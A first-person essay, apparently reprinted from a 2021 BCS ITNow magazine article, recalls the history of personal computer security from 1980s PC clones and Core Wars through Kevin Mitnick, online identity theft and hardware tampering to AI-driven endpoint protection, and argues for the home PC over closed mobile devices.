I can still remember waiting with excitement for my first IBM PC-XT clone to arrive. It was 1986 and I was newly arrived in the US doing some contracting for American Airlines. I couldn’t wait to get the large (and incredibly heavy) box open. Within a few minutes I had everything connected and plugged in. Switching it on I also remember being slightly underwhelmed by the ‘C:\>_’ prompt sitting quietly on the screen. No Windows, no pre-installed applications, just Microsoft Disk Operating System (MS-DOS), setting Bill Gates on the way to his first million.
In retrospect my personal computer was never safer than those days when it sat on my dining table in my small apartment in Tulsa. The success of the 1983 film WarGames introduced the idea of remote exploitation of computers to a wider audience. In response to this emerging threat the US passed the Federal Computer Fraud and Abuse Act in 1986, the first example of law designed for the age of the hacker.
With the introduction of a Personal Computer from the then giant of the industry IBM, the corporate world had a de-facto standard. Competitors were an eclectic selection of devices mostly from companies that no longer exist. Adoption was rapid and global. The next logical step was to somehow connect these new resources together within the company. The concept of ‘local area networks’ was born. Again IBM tried to dominate with their Token Ring technology but in the end it was the competing ethernet standard that won out.
Next we got the results of a Defence Advanced Research Projects Agency (DARPA) initiative, ARPANET which evolved further to become what we know as the Internet. Now we had PCs connected within companies and companies connected to each other, what could possibly go wrong?
Programs that would do more than take input and provide output were being imagined in the 1970s by true hackers in the days of the mainframe. These ideas were made real with the creation of Core Wars, a game developed by D. G. Jones and A. K. Dewdney in 1984. Two programs, written in a special assembly language called Redcode, were loaded into a machine and took it in turns to overwrite bytes of the machine memory in order to disable the other program. Before long programs were developed that would scan for the opposition or replicate themselves to increase the chances of success. These and other tactics emerged that in more sophisticated form would become tools of future hackers in the internet age. The creators of the game got their inspiration from a self-replicating program called Creeper, written by Bob Thomas, and a later program called Reaper that hunted and destroyed copies of Creeper.
In those heady days of the Arpanet the developers of the TCP/IP communications protocol which underpins the internet envisaged a world where information was freely exchanged. Universities were the first institutions to be connected this way and academics enjoyed this new and convenient way to communicate. But here we have the first warning sign for what was to come. Those same talented individuals that developed the means to communicate so easily had little thought for security. The brief given them by the military was for a network that would be resistant to disruption by an enemy. This caused the designers to come up with the idea of breaking data into packets to be reassembled at the destination and the ability to route around network gaps was built-in. However other aspects to security such as authentication, authorisation and protection of data in-transit (encryption) were not their priority.
Back in the early days of personal computing, before I had saved enough for my PC-clone I had a BBC Micro. Already employed as a Systems Programmer I enjoyed nothing more than overcoming the protection software on early games. Loaded from a cassette player it was possible to trace byte by byte and first understand and then defeat the copy protection. It was enough to solve the puzzle and I didn’t go into the ‘Warez’ business of pirating software but this was another indication of difficulties in protecting software.
If we jump to the 1990s the hacking and cracking scene was really taking off. I was working in San Francisco at the time Kevin Mitnick was on the run from the FBI for stealing the software for Nokia mobile phones (among other things). The story was quite big news and demonstrated the difficulty in tracking a wiley hacker in the new age of mobile communications. It also highlighted the lack of both awareness of the scale of computer security issues but also the lack of skills in law enforcement. In fact without the assistance of Tsutomo Shimomura, an Astrophysics graduate student whose computer had been penetrated by Mitnick, the FBI might not have caught him at all.
On the home front we now had Anti Virus (AV) software we could install on our PC to look for bad software and remove it. This was at least an overdue recognition that the bad actors were winning. Jump again into the noughties and the internet has proved so successful that business is moving wholesale to colonise this new frontier. Amazon becomes a household name and synonymous with all online shopping, not just books. With the convenience of online commerce came new problems. Transacting online needed to be protected and identifying the purchaser vital. This produced a new commodity to be traded amongst criminals, online identities. There used to be a saying in the early days of the net that “On the internet nobody can see you’re a dog” and criminals quickly realised that with a few key pieces of personal data they could easily adopt your persona and run up debts, apply for loans, buy things using your credit card details etc.
Jumping again to the last decade there have been improvements in company approaches to computer security, specialist units in law enforcement and an explosion of private companies offering products and services to help secure our systems. Unfortunately there is another adage in the IT security world that says the attacker only needs to be successful once to compromise a system. The defenders of that system must be successful against all attempts, all the time. Such is the current level of sophistication among attackers, whether organised crime groups or nation state actors, that traditional methods no longer work. Like the arms race of the Cold War the same tensions exist in cyberspace.
I would still argue that our home computer is a more appropriate tool to conduct our online activities with than a proprietary mobile device. Your Apple or Android phone or tablet is a largely closed world. Despite simply being a very small computer with a different interface the average user of a mobile device is totally reliant on the manufacturer for their security. The computer or laptop user does at least have an interface through which they can exert more complete control over their device. But even those using full size computers need to be aware that not only is it not possible to blindly trust our software it is also not possible to trust the hardware it is running either.
Edward Snowden showed us that the NSA is not above intercepting lawful deliveries of third party hardware (Cisco Routers in this case). The purpose being to tamper with them by inserting either modified firmware or additional hardware to provide access to the devices remotely. The US was itself a victim of similar tampering when it routinely checked chips manufactured in China and found additional circuits in the chips to those specified in the US designs. No nefarious purpose could be determined for these spurious additions but suspicions were aroused. There is a market among security conscious (some might say paranoid) people for older IBM laptops that have ‘known’ unaltered hardware and an open source BIOS. The machines are sold as having open source OS, open source BIOS (source code for both supplied) along with the verified hardware, meaning you can ‘trust’ that your system has not been modified. I have two such laptops, one is never online and holds my password vault with all my online passwords and the other is a backup.
In the corporate world the defence of secrets and proprietary data now requires the use of AI in some form or other. EndPoint Protection (EPP) systems have largely replaced traditional AV. Whereas AV systems require prior knowledge of the threat to create some sort of recognisable ‘signature’ that the scanner can look for EPP systems do not. They rely on the behaviour of either software or users on a system to identify suspicious actions. Based on the Mitre Att&ck framework, built from the study of all known hacker attacks so far, it breaks the bad actions into identifiable steps. These can then be recognised by Machine Learning (ML) algorithms usually operating in the cloud. A few years ago at the BlackHat Conference in Las Vegas a novel competition saw AI attackers try to penetrate networks protected by AI defensive programs. Echoes of William Gibson’s novel Neuromancer.
Homeworking and home schooling in these unusual times makes us part of a huge network based enterprise. We need the flexibility and relative transparency of the traditional home PC/laptop rather than the more limited, proprietary and opaque mobile devices.
(First published as ‘From Wargames to Wfh‘ in The British Computer Society’s magazine ITNow, Summer 2021